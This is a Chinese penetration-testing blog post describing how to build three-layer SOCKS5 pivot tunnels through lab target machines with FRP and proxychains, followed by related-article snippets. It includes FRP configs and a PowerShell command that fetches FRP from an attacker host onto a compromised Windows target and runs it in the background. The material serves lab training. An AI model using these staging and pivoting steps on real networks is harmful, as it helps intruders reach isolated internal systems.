小白渗透工作理解第七篇——多层代理-隧道构建

最新推荐文章于 2024-08-20 09:51:28 发布
最新推荐文章于 2024-08-20 09:51:28 发布
阅读量338 收藏 3
点赞数
分类专栏: 从零开始的LINUX运维 文章标签: linux 网络安全
原文链接:www.baidu.com
版权

声明:本文内容来源于网络,如有侵权请联系作者进行删除!!!

代理软件介绍

NPS

简介:

        一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等,并带有功能强大的web管理端。

 URL:https://github.com/ehang-io/nps

Document

FRP

简介:

        frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。

URL:https://github.com/fatedier/frp

Goproxy

简介:

Goproxy是golang实现的高性能http,https,websocket,tcp,socks5代理服务器。

  1. 链式代理,程序本身可以作为一级代理,如果设置了上级代理那么可以作为二级代理,乃至N级代理;
  2. 多协议支持,支持HTTP(S),TCP,UDP,Websocket,SOCKS5代理;
  3. [协议支持,HTTP(S),SOCKS5代理支持KCP协议传输数据,降低延迟,提升浏览体验。

URL:
https://github.com/snail007/goproxy

https://snail007.host900.com/goproxy/manual/zh/#/

FRP演示

Frp下载

URL:

https://github.com/fatedier/frp

​​

Frp管理页面:

​​

Frp多层代理案例演示

要点:

反向代理、需要先启用服务器端口。

拓扑图:

​​

第一层代理

Frps-kali

​​

frps.ini

[common]

bind_addr = 192.168.1.11

bind_port = 7000

启动客户端

 ./frps -c ./frps.ini

FRPC-第一层靶机

​​

Frpc.ini

[common]

server_addr = 192.168.1.11

server_port = 7000

[plugin_socks5]

type = tcp

remote_port = 7777

plugin = socks5

启动服务端

start /b frpc.exe

案例:

Powershell -c wget http://192.168.45.160:8000/frp_0.47.0_windows_amd64.zip -o c:\users\public\frp_0.47.0_windows_amd64.zip 

cd c:\Users\Public\

tar.exe -xf c:\Users\Public\frp_0.47.0_windows_amd64.zip

cd c:\Users\Public\frp_0.47.0_windows_amd64

start /b frpc.exe
​

​​

配置proxychain4

sudo vim /etc/proxychains4.conf

socks5 192.168.1.11 7777

使用proxychains启动burp可以直接抓包

sudo proxychains burpsuite

proxychains java -jar burpsuite.jar

第二层代理

​​拓扑:

反向代理:

二层靶机反向连接第一层靶机,也就是说一层靶机做服务端,二层靶机做客户端。

10.10.10.7为一层靶机的内网地址。

Frps-第一层的靶机。

​​

frps.ini

[common]

bind_addr = 10.10.10.7

bind_port = 7000

启动客户端。

start /b frps.exe

FRPC-第一层靶机。

​​

Frpc.ini-只改IP-改成二层中。

[common]

server_addr = 10.10.10.7

server_port = 7000
[plugin_socks5]

type = tcp

remote_port = 7777

plugin = socks5

启动

start /b frpc.exe

配置proxychain4

sudo vim /etc/proxychains4.conf

socks5 192.168.1.11 7777

socks5 10.10.10.7 7777

​​

​​

第三层代理

拓扑:

​​

第二层的靶机做服务端,第三层的客户端。

10.10.20.13为二层靶机的内网地址

Frps-第一层的靶机

​​

frps.ini

[common]

bind_addr = 10.10.20.13

bind_port = 7000

启动客户端

start /b frps.exe

FRPC-第一层靶机

​​

Frpc.ini-只改IP-改成二层中

[common]

server_addr = 10.10.20.13

server_port = 7000
[plugin_socks5]

type = tcp

remote_port = 7777

plugin = socks5

启动

start /b frpc.exe

配置proxychain4

sudo vim /etc/proxychains4.conf

socks5 192.168.1.11 7777

socks5 10.10.10.7 7777

socks5 10.10.20.13 7777

阿呗鲁
关注
专栏目录
内网渗透|内网攻防—多级代理
include_voidmain的博客
03-03 6347
0x01前言 本文讲述由公司的一次内网靶场攻防,对多级代理的建立和配置进行分享,首先介绍一下靶场。 入口是有web漏洞的linux机器,横向到一个有漏洞的winPC上(双网卡),通过双网卡ms17-010到域成员机器上,最后打域控。 这里因为篇幅原因,不说攻打靶场的全过程,直接到frp隧道的建立和连接。 攻击机(kali):172.16.222.128 入口机:192.168.10.10 winPC:192.168.10.20/ 192.168.20.10 ms17-010: 192.168.20.20/
藏经阁-阿里云总监课第二期——Latency Controlled-BLSTM模型在语音识别中的应用.pdf
08-28
【标题】:“藏经阁-阿里云总监课第二期——Latency Controlled-BLSTM模型在语音识别中的应用” 【描述】:“此文档是阿里云总监课的第二期内容,主要探讨了Latency Controlled-BLSTM(延迟控制双向长短时记忆网络...
解决多层代理发现的几个坑
法号钦尘的博客
03-19 327
首先说下网络访问代理的情...
渗透实战:内网域渗透_内网渗透实例
最新发布
shanguicsdn000的博客
08-20 438
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
多层代理转发
luminous_you的博客
08-31 2424
拓扑图 ** ** ** 拿下边界服务器 ** 访问172.16.12.2 信息搜集 wappalyzer cms:joolma框架 端口 root@kali:~# nmap 172.16.12.2 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 20:57 CST mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try us
内网穿透之多层代理
weixin_43047908的博客
10-10 2652
目录前言环境搭建ewfrp 前言 平时看大部分文章都是讲的两层网络的穿透,在真实场景下,有时候是三层甚至四层,自己实践之后发现还是和两层网络差距比较大的。由于是三层网络,写起来图会比较多,选取了四款常用穿透软件:ew,nps,frp进行试验。 环境搭建 拓扑图如下: 192.168.1.0/24模拟公网环境。 每台PC上都有一个web服务,内网主机除边缘win7外全部不出网,内网同网段之间的主机可以相互访问,不同网段相互隔离。 假设现在已经拿到边缘主机win7。(文中所指的win2012全部指相对左边这台
使用frp实现多层代理
xhscxj的博客
08-02 1055
上传frps到pc1上,上传frpc到pc2上,在pc1开启一个frp服务端,pc2开启客户端,将pc2的流量转发到pc1上。此时流量已经可以从pc1中转到pc2,咱们只需要在本地上再设置一个二层代理到pc1的frps服务端就可以访问33网段了。因为用mvc所以就不新建文件了,直接修改index.php然后访问tag让他自动加载tag/index.php就好。配置frpc.ini,将pc2的5556端口映射到pc1的7002端口上。先扫一下目录,扫目录的同时去网上找一下这个cms的漏洞。
利用Frp建立多层代理
ss810540895的博客
05-26 6178
原文 目录 简介 Frp原理 模拟环境 多层网络实战 Frp访问第一层网络 服务端配置 客户端配置 Proxifier连接 Frp访问第二层网络 Frp访问第三层网络 简介 frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 frp 主要由 客户端(frpc) 和 服务端(frps) 组成,服务端,客户端通常部署在需要穿透的内网服务所在的机器上。 项目地址:frp · Gi
iOS实例开发源码——LearnCocos2D-LearnCocos2D-f9ea793.zip
07-02
5. **Tiled Maps**:Tiled地图编辑器是Cocos2D常用的一个工具,可以创建多层的地图,并支持各种自定义属性,用于构建大型的游戏世界。 三、LearnCocos2D-f9ea793源码解析 在解压后的文件中,你可以找到多个示例项目...
卡巴斯基网络安全解决方案 ——主打PPT-V1.0.pptx
02-25
#### 七、多层安全方案 - **递进式、功能丰富的多层安全方案:** - 结合不同层级的安全产品和服务,构建多层次的安全防护体系。 - 适应不同规模的企业需求,提供定制化的安全解决方案。 #### 八、总结 - **优势...
为制造业的信息化服务——用友ERP-NC/生产制造.pdf
11-20
《为制造业的信息化服务——用友ERP-NC/生产制造》是关于制造业信息化管理解决方案的文档,主要介绍了用友ERP-NC系统在生产制造领域的应用。该系统旨在通过集成的信息化平台,提升制造业的运营效率和管理水平。 ...
frp:frp内网穿透,网络代理设置,轻轻松松穿透内网
02-09
frp | 什么是frp? frp是一种快速反向代理,可帮助您将NAT或防火墙后面的本地服务器公开到Internet。 到目前为止,它支持TCP和UDP以及HTTP和HTTPS协议,在这些协议中,请求可以通过域名转发到内部服务。 frp还具有P2P连接模式。 目录 发展状况 frp正在开发中。 请尝试在master分支中使用最新发行版,或将dev分支用于开发中的版本。 该协议可能会在发布时更改,我们不保证向后兼容。 升级客户端和服务器时,请检查发布日志。 建筑 用法示例 首先,根据您的操作系统和体系结构从“页面下载最新程序。 使用公用IP将frps和frps.ini放入服务器A。 将frpc和frpc.ini放入局域网中的服务器B(不能从公共Internet连接)。 通过SSH访问LAN中的计算机 修改frps.ini在服务器A上,并设置bind_port连接到FRP的客户:
frp构建多级网络代理
内心不种满鲜花就会长满杂草
02-01 3102
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,采用 Golang 编写,支持跨平台,仅需下载对应平台的二进制文件即可执行,没有额外依赖。frp可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。且frp不会被杀软查杀!!frp 有windows和linux两个版本, 主要包含以下文件:frps,服务端程序;frps.ini,服务端配置文件。frpc,客户端程序;frpc.ini,客户端配置文件。
Frp某场景下实现多层代理
dayouzi的博客
04-19 1277
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
frp搭建多级代理隧道
sirius的博客
08-20 525
实验目的:模拟通过远程运维不出网内网服务器实验环境:VPS:一台具有公网IP的服务器主机主机1(DMZ):网卡1:192.168.211.131 (可访问外网)网卡2:192.168.200.3 (内网网段)主机2 :网卡1:192.168.200.4(内网网段)网卡2 :192.168.100.3(内网网段)主机3:网卡::192.168.100.4网络通断情况主机1与互联网、主机2相通主机2与主机1、3相通主机3只与主机2相通。
网络安全基础篇——攻防环境搭建
Z4400840的博客
05-06 1867
在数字化时代,网络安全已经成为每个企业和个人必须面对的挑战。攻防环境的搭建是提升网络安全意识和技能的重要手段。本文将带你深入了解攻防环境的概念,以及如何一步步搭建起你自己的攻防实验平台。,即一个模拟真实网络环境的实验平台,它可以用来进行安全测试、渗透测试和安全技能训练。通过攻防环境,我们可以在不触及真实系统的前提下,练习和掌握各种安全技能。配置靶机虚拟机的ip和网关。
渗透工具】内网多级代理工具Venom详细使用教程
TT小子的博客
06-28 1608
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理渗透测试人员可以使用Venom轻松地将网络流量代理多层内网,并轻松地管理代理节点。
记一次自建靶场三层代理内网渗透过程
Boom!脑洞大爆炸的博客
07-04 799
记一次自建靶场三层代理内网渗透过程
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值